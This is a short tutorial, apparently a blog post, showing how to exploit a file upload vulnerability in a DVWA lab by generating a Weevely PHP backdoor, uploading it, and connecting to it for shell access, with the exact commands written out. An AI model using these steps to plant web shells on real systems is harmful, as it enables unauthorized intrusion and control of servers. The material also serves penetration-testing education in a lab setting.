How To Exploit File Upload vulnerablilities Using Weevely
Steps
1: Generate backdoor
2: Upload File
3: Gain Access
Let's talk about File vulnerablilities, these are the most simple type of vulnerablilities because they allow us to upload any file, so if the target allows us to php or understands php it will let us upload php file or even a php shell to gain full control of the target computer.
To start we are going to use a tool called weevely. Weevely is a very simple and straight forward tool that generates PHP web shell that act like a telnet connection.
$ weevely -h usage: weevely [-h] {terminal,session,generate} ... positional arguments: {terminal,session,generate} terminal Run terminal or command on the target session Recover an existing session generate Generate new agent options: -h, --help show this help message and exit
Command
$ weevely generate <password> <name>
once the generated file has been uploaded we will want to navigate to the file path of the upload, for exmaple in our case it would be "http://10.0.2.5/dvwa/hackable/uploads/shell.php"
Perfect! our file has successfully been uploaded, our next step is to make a connection with our file. To do this we can use weevely followed by the URL and password we inputted earlier
$ weevely http://10.0.2.5/dvwa/hackable/uploads/shell.php 54321
Now this is done, we have successful gained access into the machine via the php shell we generate using weevely
Hashtags
#hacking #hacker #cybersecurity #ethicalhacking #hackers #linux #programming #hack #technology #kalilinux #security #coding #infosec #python #tech #hackingtools #ethicalhacker #pentesting #cyber #malware #programmer #computerscience #cybercrime #cyberattack #informationsecurity #hacked #anonymous #cybersecurityawareness #coder #java
コメント